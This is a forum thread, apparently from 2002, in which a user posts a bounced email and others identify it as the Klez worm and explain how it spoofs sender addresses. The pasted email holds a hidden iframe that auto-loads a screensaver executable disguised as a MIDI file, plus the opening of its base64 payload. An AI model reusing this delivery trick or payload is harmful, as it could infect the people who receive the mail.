Woke up yesterday and found two returned emails and then two others this morning.
This is what it is.
This is a MIME-encapsulated message

Reporting-MTA: dns; rly-ip04.mx.aol.com
Arrival-Date: Wed, 21 Aug 2002 01:04:14 -0400 (EDT)

Final-Recipient: RFC822; puertorican_diva@hotmail.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mx07.hotmail.com
Diagnostic-Code: SMTP; 550 Requested action not taken: mailbox unavailable
Last-Attempt-Date: Wed, 21 Aug 2002 01:05:01 -0400 (EDT)


--------------------------------------------------------------------------------
Received: from logs-mtc-tb.proxy.aol.com (logs-mtc-tb.proxy.aol.com [64.12.104.5]) by rly-ip04.mx.aol.com (v87.21) with ESMTP id RELAYIN10-0821010414; Wed, 21 Aug 2002 01:04:14 -0400
Received: from Agdcb (ACA1B479.ipt.aol.com [172.161.180.121])
by logs-mtc-tb.proxy.aol.com (8.10.0/8.10.0) with SMTP id g7L53TE74090
for <Puertorican_diva@hotmail.com>; Wed, 21 Aug 2002 01:03:29 -0400 (EDT)
Date: Wed, 21 Aug 2002 01:03:29 -0400 (EDT)
Message-Id: <200208210503.g7L53TE74090@logs-mtc-tb.proxy.aol.com>
From: salesandservice <salesandservice@outpost.com>
To: Puertorican_diva@hotmail.com
Subject: END OF WEBTRENDS LIVE TAG
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=FA6sszb0Sm697GW60
X-Apparently-From: A1NutBoy@aol.com

--FA6sszb0Sm697GW60
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:BRg787st3INHou height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--FA6sszb0Sm697GW60
Content-Type: audio/x-midi;
name=border.scr
Content-Transfer-Encoding: base64
Content-ID: <BRg787st3INHou>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA
AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

These A's and other letters go on for ages, anyone have no idea?.

Content-Type: audio/x-midi;
name=border.scr
Content-Transfer-Encoding: base64
Content-ID: <BRg787st3INHou>


someones trying to send you a virus.. .

.scr is the extension for a screensaver , it executes if you save that and click on it.

its definately not midi because it would have .mid at the end if it was.

Most liklely the persistant klez virus. Our company is still gets multiple klez infected emails daily

So guys do you think it was sent on purpose or maybe a yes or no?.

As it was returned mail, someone who has you on their mailing list has the virus. The Klez virus puts a random addressee in the 'from' field, in these two cases it was you. The email didn't reach the intended recipient, so it was returned to *you*. I get a couple of these returned mail thingies every day :mad:

Some one has an ex employee email address in thier address book. The address in still recieved via catch all setting. Between that and the returned emails I receive 10-20 on a daily basis.

This is a virus sent to spread it. Not necessarily your ex-employee...anybody can send you the virus and it is not only you... the person must have sent to many others alongwith you from the source he found your email address from. Make it a habbit to run your antivirus system on a daily basis.

Yeah antivirus stops it. It is still annoying. I have tracked down the ISP the mail coming from and I inform thier abuse department everyday. I am sure it is someone who had our employee and some shared trade emails in their address book.

I get those virri all the time.
It sends itself out to random addys it finds on the infected computer, and uses random addys it finds on the infected computer in the from feild of the emails it sends.
Obvioulsy your email addy was in the from feild when it was sent from the infected computer to a non exsistant email address. Thats why you got the 'returned' email.
Just delete it.